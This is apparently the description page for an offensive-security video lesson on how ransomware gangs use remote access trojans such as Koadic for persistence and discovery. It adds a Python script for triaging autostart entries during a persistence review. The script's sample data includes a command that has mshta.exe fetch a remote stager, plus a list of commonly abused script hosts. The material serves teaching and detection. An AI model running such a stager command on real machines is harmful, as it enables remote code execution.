Black Hat Ransom | Lesson Six | Deploying The RAT | Offensive Security
Avoiding Big Brother
No real targets were attacked in this demonstration. I have created a safe environment using virtual machines. This demonstration is for educational purposes and for those interested in red teams and offensive security. The character Michael Connor is not real. This is a fictional person working for a fictional company, HackittIT, created for this course. Please take note, YouTube!
Once a ransomware actor has compromised a machine, they will proceed to secure continued remote access. We call this phase persistence: the attacker wants to keep their connection even when a disruption occurs (e.g. the victim restarts the system).
Ransomware gangs are known to use remote access tools, otherwise known as remote access trojans (RATs). These have built-in functionality to create persistence and to maintain a connection to a C2 server. Some gangs use legitimate red-team software such as Cobalt Strike for this purpose.
Another important activity that a RAT enables is discovery. Ransomware gangs will scan through the target computer looking for installed software and file configurations.
The information that they can gather can assist them with making decisions on file changes, what utility programs to install to make configuration changes, what security/monitoring programs to disable, and which files to encrypt. This is all preparation for the deployment of ransomware and ensuring successful encryption.
In this video, I have used a remote access tool called Koadic to demonstrate persistence and discovery. Koadic is used by penetration testers and red teams for offensive security assessments. There have also been cases where ransomware gangs have used Koadic, although this is not common.
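As an added, defender-side example that is not from the video or the course: a RAT that survives a reboot has to register itself somewhere the operating system launches at startup, so a persistence review is largely a review of autostart entries. The Python script below scores records of the kind an autoruns-style export contains and reports the ones that deserve a closer look first. The record format, the directories treated as user-writable, the list of script hosts and the sample entries (including the user name and the 203.0.113.10 address) are all constructed assumptions for this illustration.

```python
"""Triage of Windows autostart entries during a persistence review.

Added example, not from the video or course. The record format, the
directories, the script-host list and the sample entries are assumptions
constructed for the illustration.
"""
import re
from dataclasses import dataclass

# Script hosts and signed system binaries commonly abused to launch a stager
# from an autostart entry (assumed list for this example).
SCRIPT_HOSTS = {
    "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe",
    "regsvr32.exe", "powershell.exe", "cmd.exe",
}

# Directories a standard user can write to without elevation; a legitimate
# autostart binary rarely lives there, a dropped payload often does.
USER_WRITABLE = re.compile(
    r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.IGNORECASE
)


@dataclass
class AutostartEntry:
    name: str       # entry name as it appears in the key or task library
    location: str   # registry key or scheduled-task path
    command: str    # full command line that runs at startup
    signed: bool    # whether the launched binary carries a valid signature


def executable_of(command):
    """Return the lower-cased file name of the program a command line starts."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', command)
    path = m.group(1) or m.group(2)
    return path.rsplit("\\", 1)[-1].lower()


def triage(entry):
    """Return the reasons this entry merits review; an empty list means it looks benign."""
    reasons = []
    exe = executable_of(entry.command)
    if exe in SCRIPT_HOSTS:
        reasons.append(f"launches via script host {exe}")
    if USER_WRITABLE.search(entry.command):
        reasons.append("payload lives in a user-writable directory")
    if re.search(r"https?://", entry.command, re.IGNORECASE):
        reasons.append("command references a remote URL")
    if not entry.signed:
        reasons.append("launched binary is unsigned")
    return reasons


def review(entries):
    """Map the name of every suspicious entry to its list of reasons."""
    findings = {}
    for entry in entries:
        reasons = triage(entry)
        if reasons:
            findings[entry.name] = reasons
    return findings


# Constructed sample export: one benign entry and two persistence candidates.
SAMPLE_ENTRIES = [
    AutostartEntry(
        "OneDrive",
        r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
        r'"C:\Users\mconnor\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
        True,
    ),
    AutostartEntry(
        "Updater",
        r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
        r"mshta.exe http://203.0.113.10/stage",
        True,  # mshta.exe itself is a signed Microsoft binary
    ),
    AutostartEntry(
        "SysHelper",
        r"\Microsoft\Windows\SysHelper (scheduled task)",
        r'"C:\Users\Public\syshelper.exe" -q',
        False,
    ),
]


if __name__ == "__main__":
    for name, reasons in review(SAMPLE_ENTRIES).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The second sample entry is the reason the script does not rely on signature checks alone: the program that runs at startup is a signed system binary, and it is the command line (a script host fetching a remote URL) that gives the persistence away.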
To watch my videos on an alternative platform you can visit the Odysee channel: https://odysee.com/@AvoidingBigBrother:8 This channel will include videos too risky for YouTube because of content moderation.
I have dropped the pitch of my voice for the videos and use the alias of Brian Bladen for privacy reasons. I am also paranoid about being hacked!
FREE TRAINING on our website at https://avoidbigbro.com/lp-courses/ and for blog posts https://avoidbigbro.com/news/
Join the Discord: https://avoidbigbro.com/the-discord-server/
My recommended products (so far) that I use as a lone wolf operator:
Malwarebytes Premium - Antimalware software suitable for personal use and not an option for business users. Affiliate link included - feel free to go to Malwarebytes in your browser if you don't want to include my link https://prf.hn/l/5NL4PJj
CyberGhost - I had no problems with this VPN and highly recommend. They are based in Romania where the laws on privacy are not so strict. Not truly anonymous but good for privacy. https://www.cyberghostvpn.com/en_US/
KeePass - Excellent offline password manager that I recommend rather than using a cloud service. https://keepass.info/
You can check out my ebooks at https://avoidbigbro.com/resources/
Available titles: 'Covert Techniques', a guide about privacy and how to avoid surveillance; 'The Bear Roars', my research on Russian state-sponsored APT groups. Author Brian Bladen ... https://www.youtube.com/watch?v=iiHlX-7Y5Y0